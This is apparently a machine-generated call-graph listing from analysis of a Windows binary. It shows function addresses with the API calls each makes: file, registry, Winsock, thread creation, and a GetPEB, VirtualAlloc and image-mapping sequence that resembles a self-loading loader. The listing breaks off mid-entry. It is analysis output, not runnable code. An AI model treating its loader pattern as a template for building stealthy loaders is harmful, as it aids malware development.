127701->127715 127778 6c86a16f 127703->127778 127705 6c86a027 127705->127690 127706->127687 127707->127696 127709 6c85b12e 127708->127709 127710 6c85b119 127708->127710 127709->127701 127726 6c84f976 14 API calls ___free_lconv_mon 127710->127726 127712 6c85b11e 127727 6c85c227 29 API calls ___crtDownlevelLCIDToLocaleName 127712->127727 127714 6c85b129 127714->127701 127717 6c86c032 ___scrt_is_nonwritable_in_current_image 127715->127717 127716 6c86c03a 127716->127698 127717->127716 127718 6c86c073 127717->127718 127720 6c86c0b9 127717->127720 127757 6c85c3d0 29 API calls 2 library calls 127718->127757 127728 6c85b941 EnterCriticalSection 127720->127728 127722 6c86c0bf 127723 6c86c0dd 127722->127723 127729 6c86be0a 127722->127729 127758 6c86c12f LeaveCriticalSection __wsopen_s 127723->127758 127726->127712 127727->127714 127728->127722 127730 6c86be32 127729->127730 127754 6c86be55 __fread_nolock 127729->127754 127731 6c86be36 127730->127731 127733 6c86be91 127730->127733 127773 6c85c3d0 29 API calls 2 library calls 127731->127773 127734 6c86beaf 127733->127734 127735 6c86a00e __wsopen_s 31 API calls 127733->127735 127759 6c86c137 127734->127759 127735->127734 127738 6c86bec7 127742 6c86bef6 127738->127742 127743 6c86becf 127738->127743 127739 6c86bf0e 127740 6c86bf77 WriteFile 127739->127740 127741 6c86bf22 127739->127741 127746 6c86bf99 GetLastError 127740->127746 127740->127754 127744 6c86bf63 127741->127744 127745 6c86bf2a 127741->127745 127775 6c86c1b4 45 API calls 3 library calls 127742->127775 127743->127754 127774 6c86c57b 6 API calls __wsopen_s 127743->127774 127746->127754 127754->127723 127757->127716 127758->127716 127760 6c870a7f __fread_nolock 29 API calls 127759->127760 127763 6c86c149 127760->127763 127761 6c86bec1 127761->127738 127761->127739 127762 6c86c177 127762->127761 127765 6c86c191 GetConsoleMode 127762->127765 127763->127761 127763->127762 127764 6c84fce0 __wsopen_s 39 API calls 127763->127764 127764->127762 127765->127761 127773->127754 127774->127754 127784 6c85b553 127778->127784 127780 6c86a181 127781 6c86a19d SetFilePointerEx 127780->127781 127783 6c86a189 __fread_nolock 127780->127783 127782 6c86a1b5 GetLastError 127781->127782 127781->127783 127782->127783 127783->127705 127785 6c85b575 127784->127785 127786 6c85b560 127784->127786 127788 6c85b59a 127785->127788 127794 6c84f976 14 API calls ___free_lconv_mon 127785->127794 127793 6c84f976 14 API calls ___free_lconv_mon 127786->127793 127788->127780 127789 6c85b56d 127789->127780 127791 6c85b5ad 127795 6c85c227 29 API calls ___crtDownlevelLCIDToLocaleName 127791->127795 127793->127789 127794->127791 127795->127789 127797 6c85ee4d ___scrt_is_nonwritable_in_current_image 127796->127797 127798 6c85ee57 127797->127798 127799 6c85ee7a 127797->127799 127822 6c85c3d0 29 API calls 2 library calls 127798->127822 127801 6c85ee72 127799->127801 127807 6c84f83a EnterCriticalSection 127799->127807 127801->127444 127803 6c85ee98 127808 6c85edb3 127803->127808 127805 6c85eea5 127823 6c85eed0 LeaveCriticalSection __fread_nolock 127805->127823 127807->127803 127809 6c85edc0 127808->127809 127810 6c85ede3 127808->127810 127835 6c85c3d0 29 API calls 2 library calls 127809->127835 127812 6c85ef99 ___scrt_uninitialize_crt 64 API calls 127810->127812 127820 6c85eddb 127810->127820 127813 6c85edfb 127812->127813 127824 6c86810c 127813->127824 127816 6c85b10d __fread_nolock 29 API calls 127817 6c85ee0f 127816->127817 127828 6c86bb80 127817->127828 127820->127805 127821 6c8637d7 ___free_lconv_mon 14 API calls 127821->127820 127822->127801 127823->127801 127825 6c868123 127824->127825 127826 6c85ee03 127824->127826 127825->127826 127827 6c8637d7 ___free_lconv_mon 14 API calls 127825->127827 127826->127816 127827->127826 127831 6c85ee16 127828->127831 127832 6c86bba9 127828->127832 127829 6c86bbf8 127844 6c85c3d0 29 API calls 2 library calls 127829->127844 127831->127820 127831->127821 127832->127829 127833 6c86bbd0 127832->127833 127836 6c86bc23 127833->127836 127835->127820 127837 6c86bc2f ___scrt_is_nonwritable_in_current_image 127836->127837 127845 6c85b941 EnterCriticalSection 127837->127845 127839 6c86bc3d 127840 6c86bc6e 127839->127840 127846 6c86bae0 127839->127846 127859 6c86bca8 LeaveCriticalSection __wsopen_s 127840->127859 127843 6c86bc91 127843->127831 127844->127831 127845->127839 127847 6c85b553 __fread_nolock 29 API calls 127846->127847 127848 6c86baf0 127847->127848 127859->127843 127861->127311 127862->127320 127863->127318 127864->127344 127865->127346 127867->127351 127868 2230032 127878 2230ae4 GetPEB 127868->127878 127871 2230ae4 GetPEB 127874 22302a7 127871->127874 127872 22304a6 GetNativeSystemInfo 127873 22304d3 VirtualAlloc 127872->127873 127876 2230a02 127872->127876 127875 22304ec 127873->127875 127874->127872 127874->127876 127880 10007813 127875->127880 127879 223029b 127878->127879 127879->127871 127881 10007823 127880->127881 127882 1000781e 127880->127882 127886 1000771d 127881->127886 127894 1000b54b GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 127882->127894 127885 10007831 127885->127876 127887 10007729 _doexit 127886->127887 127891 10007776 127887->127891 127892 100077c6 _doexit 127887->127892 127895 100075b9 127887->127895 127889 100077a6 127890 100075b9 __CRT_INIT@12 149 API calls 127889->127890 127889->127892 127890->127892 127891->127889 127891->127892 127893 100075b9 __CRT_INIT@12 149 API calls 127891->127893 127892->127885 127893->127889 127894->127881 127896 100075c5 _doexit 127895->127896 127897 10007647 127896->127897 127898 100075cd 127896->127898 127899 100076a8 127897->127899 127900 1000764d 127897->127900 127946 1000803b HeapCreate 127898->127946 127903 10007706 127899->127903 127904 100076ad 127899->127904 127906 1000766b 127900->127906 127912 100075d6 _doexit 127900->127912 127971 10008306 66 API calls _doexit 127900->127971 127902 100075d2 127902->127912 127965 10009ac6 86 API calls 4 library calls 127902->127965 127903->127912 127977 10009a58 79 API calls __freefls@4 127903->127977 127905 10009754 ___set_flsgetvalue 3 API calls 127904->127905 127908 100076b2 127905->127908 127911 1000767f 127906->127911 127972 1000b0e4 67 API calls _free 127906->127972 127913 10009fe4 __calloc_crt 66 API calls 127908->127913 127975 10007692 70 API calls __mtterm 127911->127975 127912->127891 127917 100076be 127913->127917 127914 100075e2 __RTC_Initialize 127923 100075f2 GetCommandLineA 127914->127923 127938 100075e6 127914->127938 127917->127912 127919 100076ca DecodePointer 127917->127919 127918 10007675 127973 100097a5 70 API calls _free 127918->127973 127925 100076df 127919->127925 127922 100075eb 127922->127912 127947 1000b468 71 API calls 2 library calls 127923->127947 127924 1000767a 127974 10008059 HeapDestroy 127924->127974 127928 100076e3 127925->127928 127929 100076fa 127925->127929 127932 100097e2 __CRT_INIT@12 66 API calls 127928->127932 127976 10006e49 66 API calls 2 library calls 127929->127976 127930 10007602 127948 1000ae9f 73 API calls __calloc_crt 127930->127948 127935 100076ea GetCurrentThreadId 127932->127935 127934 1000760c 127943 10007610 127934->127943 127968 1000b3ad 95 API calls 3 library calls 127934->127968 127935->127912 127966 10008059 HeapDestroy 127938->127966 127939 1000761c 127940 10007630 127939->127940 127949 1000b137 127939->127949 127940->127922 127970 1000b0e4 67 API calls _free 127940->127970 127967 100097a5 70 API calls _free 127943->127967 127946->127902 127947->127930 127948->127934 127950 1000b140 127949->127950 127953 1000b145 _strlen 127949->127953 127978 1000de61 94 API calls __setmbcp 127950->127978 127952 10009fe4 __calloc_crt 66 API calls 127958 1000b17a _strlen 127952->127958 127953->127952 127956 10007625 127953->127956 127954 1000b1c9 127980 10006e49 66 API calls 2 library calls 127954->127980 127956->127940 127969 10008119 77 API calls 4 library calls 127956->127969 127957 10009fe4 __calloc_crt 66 API calls 127957->127958 127958->127954 127958->127956 127958->127957 127959 1000b1ef 127958->127959 127962 1000b206 127958->127962 127979 10007f48 66 API calls __cftoe_l 127958->127979 127981 10006e49 66 API calls 2 library calls 127959->127981 127982 100086b0 10 API calls __call_reportfault 127962->127982 127964 1000b212 127965->127914 127966->127922 127967->127938 127968->127939 127969->127940 127970->127943 127971->127906 127972->127918 127973->127924 127974->127911 127975->127912 127976->127912 127977->127912 127978->127953 127979->127958 127980->127956 127981->127956 127982->127964 127983 10006013 127984 10006045 127983->127984 127985 10020003 127984->127985 127988 1000608a 127984->127988 127991 10005e07 127984->127991 127989 100060a0 RegOpenKeyExW 127988->127989 127990 10003f35 127989->127990 127990->127990 127992 1001f0f9 RegQueryValueExW 127991->127992 127993 10003f35 127992->127993 127993->127993 127994 6c6e093a 127999 6c740f7c 127994->127999 127996 6c6e0944 127997 6c6e1262 32 API calls 127996->127997 127998 6c6e094e 127997->127998 128000 6c740f88 __EH_prolog3 127999->128000 128003 6c7412d8 128000->128003 128002 6c741171 Concurrency::details::ExternalContextBase::~ExternalContextBase 128002->127996 128004 6c7412f9 __fread_nolock 128003->128004 128013 6c741380 128003->128013 128007 6c741329 VerSetConditionMask VerSetConditionMask VerifyVersionInfoW GetSystemMetrics 128004->128007 128006 6c741393 128006->128002 128014 6c741395 128007->128014 128177 6c7a11c4 5 API calls ___raise_securityfailure 128013->128177 128178 6c7a11d2 128014->128178 128016 6c7413a1 GetSysColor 128017 6c7413c2 GetSysColor 128016->128017 128018 6c7413b6 GetSysColor 128016->128018 128020 6c7413d9 GetSysColor 128017->128020 128021 6c7413e5 128017->128021 128018->128017 128020->128021 128179 6c6e2c90 128021->128179 128023 6c7413fb 22 API calls 128024 6c741525 128023->128024 128025 6c74152e GetSysColor 128023->128025 128026 6c741540 GetSysColorBrush 128024->128026 128025->128026 128027 6c74155c GetSysColorBrush 128026->128027 128028 6c7417ad 128026->128028 128027->128028 128029 6c74156f GetSysColorBrush 128027->128029 128219 6c75e7dc RaiseException CallUnexpected 128028->128219 128029->128028 128031 6c741582 128029->128031 128187 6c6e1e5c 128031->128187 128034 6c74158f CreateSolidBrush 128192 6c6e1e06 128034->128192 128037 6c6e1e5c 73 API calls 128038 6c7415ad CreateSolidBrush 128037->128038 128039 6c6e1e06 72 API calls 128038->128039 128040 6c7415be 128039->128040 128041 6c6e1e5c 73 API calls 128040->128041 128042 6c7415cb CreateSolidBrush 128041->128042 128043 6c6e1e06 72 API calls 128042->128043 128044 6c7415dc 128043->128044 128045 6c6e1e5c 73 API calls 128044->128045 128046 6c7415e9 CreateSolidBrush 128045->128046 128047 6c6e1e06 72 API calls 128046->128047 128048 6c7415fd 128047->128048 128049 6c6e1e5c 73 API calls 128048->128049 128050 6c74160a CreateSolidBrush 128049->128050 128051 6c6e1e06 72 API calls 128050->128051 128052 6c74161b 128051->128052 128053 6c6e1e5c 73 API calls 128052->128053 128054 6c741628 CreateSolidBrush 128053->128054 128055 6c6e1e06 72 API calls 128054->128055 128056 6c741639 128055->128056 128057 6c6e1e5c 73 API calls 128056->128057 128058 6c741646 CreateSolidBrush 128057->128058 128059 6c6e1e06 72 API calls 128058->128059 128060 6c741657 128059->128060 128061 6c6e1e5c 73 API calls 128060->128061 128062 6c741664 CreatePen 128061->128062 128063 6c6e1e06 72 API calls 128062->128063 128064 6c74167d 128063->128064 128065 6c6e1e5c 73 API calls 128064->128065 128066 6c74168a CreatePen 128065->128066 128067 6c6e1e06 72 API calls 128066->128067 128068 6c7416a1 128067->128068 128069 6c6e1e5c 73 API calls 128068->128069 128070 6c7416ae CreatePen 128069->128070 128071 6c6e1e06 72 API calls 128070->128071 128177->128006 128178->128016 128180 6c6e2c9c __EH_prolog3 128179->128180 128181 6c6e2cbf GetWindowDC 128180->128181 128220 6c6e1ff3 128181->128220 128185 6c6e2cd5 Concurrency::details::ExternalContextBase::~ExternalContextBase 128185->128023 128188 6c6e1e65 128187->128188 128189 6c6e1e62 128187->128189 128258 6c6e1e32 128188->128258 128189->128034 128191 6c6e1e6a DeleteObject 128191->128034 128193 6c6e1e13 128192->128193 128197 6c6e1e28 128192->128197 128194 6c6e2e58 72 API calls 128193->128194 128195 6c6e1e1d 128194->128195 128196 6c7a06ff RaiseException 128195->128196 128196->128197 128197->128037 128221 6c6e2000 128220->128221 128225 6c6e2016 128220->128225 128227 6c6e2de7 128221->128227 128223 6c6e200b 128235 6c7a06ff 128223->128235 128225->128185 128226 6c6e178d RaiseException CallUnexpected 128225->128226 128228 6c6e2df3 __EH_prolog3 128227->128228 128239 6c75c8ec 128228->128239 128230 6c6e2df8 Concurrency::details::ExternalContextBase::~ExternalContextBase 128231 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128230->128231 128234 6c6e2e3e Concurrency::details::ExternalContextBase::~ExternalContextBase 128230->128234 128232 6c6e2e19 128231->128232 128232->128234 128246 6c7a0f88 RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 ~refcount_ptr 128232->128246 128234->128223 128237 6c7a0719 Concurrency::details::ExternalContextBase::~ExternalContextBase 128235->128237 128236 6c7a0737 128236->128225 128237->128236 128248 6c7a0884 128237->128248 128240 6c75c8b9 Concurrency::details::ExternalContextBase::~ExternalContextBase 72 API calls 128239->128240 128241 6c75c8f1 128240->128241 128242 6c7a170b Concurrency::details::ExternalContextBase::~ExternalContextBase 66 API calls 128241->128242 128243 6c75c8fe 128242->128243 128243->128230 128247 6c84c646 RaiseException 128243->128247 128245 6c75e7f5 128246->128234 128247->128245 128249 6c7a089b 128248->128249 128250 6c7a088d 128248->128250 128249->128236 128252 6c7616c4 128250->128252 128253 6c7616ce 128252->128253 128254 6c7616d4 Concurrency::details::ExternalContextBase::~ExternalContextBase 128253->128254 128257 6c75e7dc RaiseException CallUnexpected 128253->128257 128254->128249 128259 6c6e1e3d 128258->128259 128260 6c6e1e44 128258->128260 128262 6c6e2e58 128259->128262 128260->128191 128263 6c6e2e64 __EH_prolog3 128262->128263 128264 6c75c8ec Concurrency::details::ExternalContextBase::~ExternalContextBase 72 API calls 128263->128264 128265 6c6e2e69 Concurrency::details::ExternalContextBase::~ExternalContextBase 128264->128265 128266 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128265->128266 128269 6c6e2eaf Concurrency::details::ExternalContextBase::~ExternalContextBase 128265->128269 128267 6c6e2e8a 128266->128267 128267->128269 128270 6c7a0f88 RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 ~refcount_ptr 128267->128270 128269->128260 128270->128269 128340 6c6d82f4 128352 6c6d6a5d 17 API calls 128340->128352 128343 6c6d82fa 128347 6c6d7234 128343->128347 128353 6c6d76c2 40 API calls 128343->128353 128345 6c6d830f Sleep 128346 6c6d82eb 128345->128346 128346->128340 128354 6c85b987 128347->128354 128349 6c6d7244 128351 6c6d76ba 128349->128351 128362 6c85b9d7 14 API calls 2 library calls 128349->128362 128351->128343 128352->128343 128353->128345 128355 6c85b993 ___scrt_is_nonwritable_in_current_image 128354->128355 128363 6c85c939 EnterCriticalSection 128355->128363 128357 6c85b99a 128364 6c85bc45 128357->128364 128361 6c85b9b9 128361->128349 128362->128349 128363->128357 128365 6c85bc63 128364->128365 128367 6c85bc72 128365->128367 128379 6c86a286 CreateFileW ___initconin 128365->128379 128390 6c7a11c4 5 API calls ___raise_securityfailure 128367->128390 128368 6c85bc7f 128368->128367 128380 6c86a2f7 5 API calls ___initconin 128368->128380 128371 6c85b9a8 128378 6c85b9ce LeaveCriticalSection std::_Lockit::~_Lockit 128371->128378 128372 6c85bc90 128372->128367 128375 6c85bcbd 128372->128375 128377 6c85bcfa 128372->128377 128381 6c863811 128372->128381 128375->128377 128388 6c86a33d 5 API calls ___initconin 128375->128388 128389 6c82e919 14 API calls ___std_exception_destroy 128377->128389 128378->128361 128379->128368 128380->128372 128382 6c86384f 128381->128382 128386 6c86381f __Getctype 128381->128386 128392 6c84f976 14 API calls ___free_lconv_mon 128382->128392 128384 6c86383a RtlAllocateHeap 128385 6c86384d 128384->128385 128384->128386 128385->128375 128386->128382 128386->128384 128391 6c859b6b EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 128386->128391 128388->128377 128389->128367 128390->128371 128391->128386 128392->128385 128393 6c86a41b CreateFileW 128394 1001f0df 128401 10002c60 WSAStartup CreateEventW InterlockedExchange 128394->128401 128397 1001f0e4 128398 1001f7db 128397->128398 128404 10006f17 128397->128404 128416 10005a20 CreateEventW 128398->128416 128402 10006815 __crtGetStringTypeA_stat 5 API calls 128401->128402 128403 10002cff 128402->128403 128403->128397 128406 10006f21 128404->128406 128405 10006e83 _malloc 66 API calls 128405->128406 128406->128405 128407 10006f3b 128406->128407 128412 10006f3d std::exception::exception 128406->128412 128444 10008550 DecodePointer 128406->128444 128407->128397 128409 10006f7b 128446 10006e24 66 API calls std::exception::operator= 128409->128446 128411 10006f85 128447 10007836 RaiseException 128411->128447 128412->128409 128445 100073e9 76 API calls __cinit 128412->128445 128415 10006f96 128417 10005a83 128416->128417 128418 10005a79 128416->128418 128448 10006410 HeapCreate 128417->128448 128454 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 128418->128454 128422 10005b12 128455 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 128422->128455 128423 10005b1c CreateEventW 128425 10005b55 128423->128425 128426 10005b5f CreateEventW 128423->128426 128456 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 128425->128456 128428 10005b84 CreateEventW 128426->128428 128429 10005b7a 128426->128429 128431 10005ba9 InitializeCriticalSectionAndSpinCount 128428->128431 128432 10005b9f 128428->128432 128457 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 128429->128457 128434 10005c77 InitializeCriticalSectionAndSpinCount 128431->128434 128435 10005c6d 128431->128435 128458 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 128432->128458 128437 10005c98 InterlockedExchange timeGetTime CreateEventW CreateEventW 128434->128437 128438 10005c8e 128434->128438 128459 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 128435->128459 128440 100067ff 77 API calls 128437->128440 128460 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 128438->128460 128441 10005d2b 128440->128441 128442 100067ff 77 API calls 128441->128442 128443 10005d3b 128442->128443 128444->128406 128445->128409 128446->128411 128447->128415 128449 10006441 128448->128449 128450 10006437 128448->128450 128452 10005af2 InitializeCriticalSectionAndSpinCount 128449->128452 128462 10006e49 66 API calls 2 library calls 128449->128462 128461 10001280 DeleteCriticalSection RaiseException __CxxThrowException@8 128450->128461 128452->128422 128452->128423 128454->128417 128455->128423 128456->128426 128457->128428 128458->128431 128459->128434 128460->128437 128461->128449 128462->128452 128463 6c6b8474 128464 6c6b847e 128463->128464 128466 6c6b84a0 128464->128466 128467 6c75b4b6 128464->128467 128468 6c75c8b9 Concurrency::details::ExternalContextBase::~ExternalContextBase 72 API calls 128467->128468 128469 6c75b4bf 128468->128469 128470 6c80e632 Concurrency::details::ExternalContextBase::~ExternalContextBase 6 API calls 128469->128470 128471 6c75b4c8 128470->128471 128476 6c7a12dc 128471->128476 128474 6c80e6a6 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 128475 6c75b4da 128474->128475 128475->128464 128477 6c75b4d3 128476->128477 128478 6c7a12f6 128476->128478 128477->128474 128481 6c75e7dc RaiseException CallUnexpected 128478->128481 128482 100032e0 6 API calls 128483 6c6cda8d SHGetFolderPathA 128484 6c6cdaeb _strlen 128483->128484 128492 6c6cdab7 _Yarn 128483->128492 128485 6c6cdb7b 128484->128485 128486 6c6cdb04 128484->128486 128487 6c6b9714 30 API calls 128485->128487 128488 6c6cdb3f 128486->128488 128489 6c6cdb47 128486->128489 128486->128492 128487->128485 128493 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128488->128493 128491 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128489->128491 128491->128492 128493->128492 128494 6c6bcb4a 128496 6c6bcb74 128494->128496 128497 6c6bcd3f 128496->128497 128498 6c85ed83 69 API calls 128496->128498 128499 6c6bfd78 128496->128499 128498->128496 128500 6c6bfd97 128499->128500 128502 6c6c0238 128500->128502 128503 6c86009d 128500->128503 128502->128496 128504 6c8600b0 swprintf 128503->128504 128507 6c86027e 128504->128507 128506 6c8600c5 swprintf 128506->128500 128508 6c8602b4 128507->128508 128509 6c86028c 128507->128509 128508->128506 128509->128508 128510 6c8602bb 128509->128510 128511 6c860299 128509->128511 128515 6c860341 128510->128515 128523 6c85c3d0 29 API calls 2 library calls 128511->128523 128516 6c86034d ___scrt_is_nonwritable_in_current_image 128515->128516 128524 6c84f83a EnterCriticalSection 128516->128524 128518 6c86035b 128525 6c8602f5 128518->128525 128522 6c8602f3 128522->128506 128523->128508 128524->128518 128533 6c867f3a 128525->128533 128531 6c860337 128532 6c860390 LeaveCriticalSection __fread_nolock 128531->128532 128532->128522 128551 6c867fe5 128533->128551 128535 6c86030d 128540 6c8600d7 128535->128540 128536 6c867f4b 128536->128535 128537 6c863811 __fread_nolock 15 API calls 128536->128537 128538 6c867fa4 128537->128538 128539 6c8637d7 ___free_lconv_mon 14 API calls 128538->128539 128539->128535 128543 6c8600e9 128540->128543 128545 6c860112 128540->128545 128541 6c8600f7 128583 6c85c3d0 29 API calls 2 library calls 128541->128583 128543->128541 128543->128545 128549 6c86012d _Yarn 128543->128549 128550 6c868023 64 API calls ___scrt_uninitialize_crt 128545->128550 128546 6c85ef99 ___scrt_uninitialize_crt 64 API calls 128546->128549 128547 6c85b10d __fread_nolock 29 API calls 128547->128549 128548 6c86c026 __wsopen_s 64 API calls 128548->128549 128549->128545 128549->128546 128549->128547 128549->128548 128570 6c86cb31 128549->128570 128550->128531 128552 6c867ff1 128551->128552 128553 6c86801b 128552->128553 128554 6c85b10d __fread_nolock 29 API calls 128552->128554 128553->128536 128555 6c86800c 128554->128555 128558 6c870a7f 128555->128558 128557 6c868012 128557->128536 128559 6c870a8c 128558->128559 128561 6c870a99 128558->128561 128567 6c84f976 14 API calls ___free_lconv_mon 128559->128567 128563 6c870aa5 128561->128563 128568 6c84f976 14 API calls ___free_lconv_mon 128561->128568 128562 6c870a91 128562->128557 128563->128557 128565 6c870ac6 128569 6c85c227 29 API calls ___crtDownlevelLCIDToLocaleName 128565->128569 128567->128562 128568->128565 128569->128562 128571 6c86cbc1 128570->128571 128572 6c85b10d __fread_nolock 29 API calls 128571->128572 128574 6c86cbce 128572->128574 128573 6c86cbda 128573->128549 128574->128573 128579 6c86cc26 128574->128579 128589 6c86cb3c 31 API calls __fread_nolock 128574->128589 128575 6c86cc88 128590 6c86ccb7 64 API calls 2 library calls 128575->128590 128577 6c867fe5 29 API calls 128580 6c86cc7b 128577->128580 128579->128573 128579->128575 128579->128577 128580->128575 128584 6c86e2d1 128580->128584 128581 6c86cc99 128581->128549 128583->128545 128585 6c866b28 __Getctype 14 API calls 128584->128585 128586 6c86e2ee 128585->128586 128587 6c8637d7 ___free_lconv_mon 14 API calls 128586->128587 128588 6c86e2f8 128587->128588 128588->128575 128589->128579 128590->128581 128591 4a152f 128596 6c6db654 128591->128596 128664 6c6d86c6 WSAStartup 128591->128664 128666 6c6db752 128591->128666 128592 4a1535 128597 6c6db66d GetModuleHandleA 128596->128597 128598 6c6db66b 128596->128598 128599 6c6db67f __fread_nolock 128597->128599 128611 6c6db6c7 _Yarn 128597->128611 128598->128597 128600 6c6db691 GetModuleFileNameA 128599->128600 128601 6c6db6a1 _strlen 128600->128601 128600->128611 128602 6c6db74d 128601->128602 128603 6c6db6c0 128601->128603 128604 6c6b9714 30 API calls 128602->128604 128605 6c6db719 128603->128605 128606 6c6db711 128603->128606 128603->128611 128607 6c6db752 128604->128607 128609 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128605->128609 128908 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128606->128908 128721 6c6db195 GetModuleFileNameA 128607->128721 128609->128611 128611->128592 128612 6c6dbce0 128615 6c6b9714 30 API calls 128612->128615 128613 6c6db78f 128613->128612 128614 6c6db7c3 128613->128614 128621 6c6dbbfa 128613->128621 128637 6c6db7cc std::ios_base::_Ios_base_dtor _Yarn 128613->128637 128909 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128614->128909 128616 6c6dbcec 128615->128616 128618 6c6b9714 30 API calls 128616->128618 128620 6c6dbcf8 128618->128620 128622 6c6bc08c 29 API calls 128620->128622 128623 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128621->128623 128625 6c6dbd07 128622->128625 128623->128637 128624 6c6dbcdb 128627 6c85c237 29 API calls 128624->128627 128625->128592 128626 6c6db912 std::ios_base::_Ios_base_dtor 128626->128624 128657 6c6dbac9 std::ios_base::_Ios_base_dtor 128626->128657 128773 6c6d9828 128626->128773 128627->128612 128628 6c6dbb40 CreateThread 128631 6c6dbb5a WaitForSingleObject 128628->128631 128632 6c6dbc35 128628->128632 129241 6c6d9b35 128628->129241 128631->128632 128635 6c6dbb73 CloseHandle 128631->128635 128849 6c6db3ef GetModuleFileNameA 128632->128849 128633 6c6db979 128638 6c6db195 31 API calls 128633->128638 128634 6c6dbb18 CreateThread 128634->128628 129219 6c6da446 128634->129219 128640 6c6dbb82 128635->128640 128644 6c6dbbab std::ios_base::_Ios_base_dtor 128635->128644 128637->128624 128744 6c6d9168 128637->128744 128642 6c6db985 128638->128642 128640->128624 128640->128644 128641 6c6dbc45 128875 6c6db0de GetModuleFileNameA 128641->128875 128642->128616 128646 6c6db9b6 128642->128646 128653 6c6dbc1d 128642->128653 128658 6c6db9bf std::ios_base::_Ios_base_dtor _Yarn 128642->128658 128644->128592 128645 6c6dbc58 128885 6c6d83fc 128645->128885 128910 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128646->128910 128648 6c6dbc72 128650 6c6db654 175 API calls 128648->128650 128652 6c6dbc8c 128650->128652 128654 6c6bc08c 29 API calls 128652->128654 128655 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128653->128655 128656 6c6dbc9a 128654->128656 128655->128658 128901 6c6d9953 GetModuleHandleA 128656->128901 128657->128624 128657->128628 128794 6c6da6cf 128657->128794 128658->128624 128781 6c86067e 128658->128781 128661 6c6d86c6 WSAStartup 128662 6c6dbcd4 128661->128662 128911 6c859c1f 21 API calls _unexpected 128662->128911 128665 6c6d8550 128664->128665 128667 6c6db786 128666->128667 128668 6c6db195 31 API calls 128667->128668 128670 6c6db78f 128668->128670 128669 6c6dbce0 128672 6c6b9714 30 API calls 128669->128672 128670->128669 128671 6c6db7c3 128670->128671 128678 6c6dbbfa 128670->128678 128694 6c6db7cc std::ios_base::_Ios_base_dtor _Yarn 128670->128694 129310 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128671->129310 128673 6c6dbcec 128672->128673 128675 6c6b9714 30 API calls 128673->128675 128674 6c6d9168 100 API calls 128683 6c6db912 std::ios_base::_Ios_base_dtor 128674->128683 128677 6c6dbcf8 128675->128677 128679 6c6bc08c 29 API calls 128677->128679 128680 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128678->128680 128682 6c6dbd07 128679->128682 128680->128694 128681 6c6dbcdb 128684 6c85c237 29 API calls 128681->128684 128682->128592 128683->128681 128686 6c6d9828 84 API calls 128683->128686 128713 6c6dbac9 std::ios_base::_Ios_base_dtor 128683->128713 128684->128669 128685 6c6dbb40 CreateThread 128688 6c6dbb5a WaitForSingleObject 128685->128688 128689 6c6dbc35 128685->128689 129314 6c6d9b35 Sleep 128685->129314 128690 6c6db979 128686->128690 128687 6c6da6cf 38 API calls 128691 6c6dbb18 CreateThread 128687->128691 128688->128689 128692 6c6dbb73 CloseHandle 128688->128692 128693 6c6db3ef 31 API calls 128689->128693 128695 6c6db195 31 API calls 128690->128695 128691->128685 129315 6c6da446 41 API calls 4 library calls 128691->129315 128697 6c6dbb82 128692->128697 128699 6c6dbbab std::ios_base::_Ios_base_dtor 128692->128699 128698 6c6dbc45 128693->128698 128694->128674 128694->128681 128702 6c6db985 128695->128702 128697->128681 128697->128699 128700 6c6db0de 31 API calls 128698->128700 128699->128592 128701 6c6dbc58 128700->128701 128704 6c6d83fc 30 API calls 128701->128704 128702->128673 128703 6c6db9b6 128702->128703 128710 6c6dbc1d 128702->128710 128715 6c6db9bf std::ios_base::_Ios_base_dtor _Yarn 128702->128715 129311 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128703->129311 128705 6c6dbc72 128704->128705 128707 6c6db654 182 API calls 128705->128707 128706 6c86067e 44 API calls 128706->128713 128709 6c6dbc8c 128707->128709 128711 6c6bc08c 29 API calls 128709->128711 128712 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128710->128712 128714 6c6dbc9a 128711->128714 128712->128715 128713->128681 128713->128685 128713->128687 128716 6c6d9953 93 API calls 128714->128716 128715->128681 128715->128706 128717 6c6dbcbd CreateThread 128716->128717 128718 6c6d86c6 WSAStartup 128717->128718 129313 6c6d9b14 128717->129313 128719 6c6dbcd4 128718->128719 129312 6c859c1f 21 API calls _unexpected 128719->129312 128722 6c6db1ec _strlen 128721->128722 128723 6c6db3c5 128722->128723 128724 6c6db1f7 128722->128724 128725 6c6b9714 30 API calls 128723->128725 128727 6c6db238 128724->128727 128728 6c6db240 128724->128728 128736 6c6db1fe _Yarn 128724->128736 128726 6c6db3ca 128725->128726 128729 6c6b9714 30 API calls 128726->128729 128912 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 128727->128912 128731 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 128728->128731 128743 6c6db2d2 _Yarn 128729->128743 128731->128736 128732 6c85c237 29 API calls 128733 6c6db3db 128732->128733 128734 6c6bc08c 29 API calls 128733->128734 128735 6c6db3ea 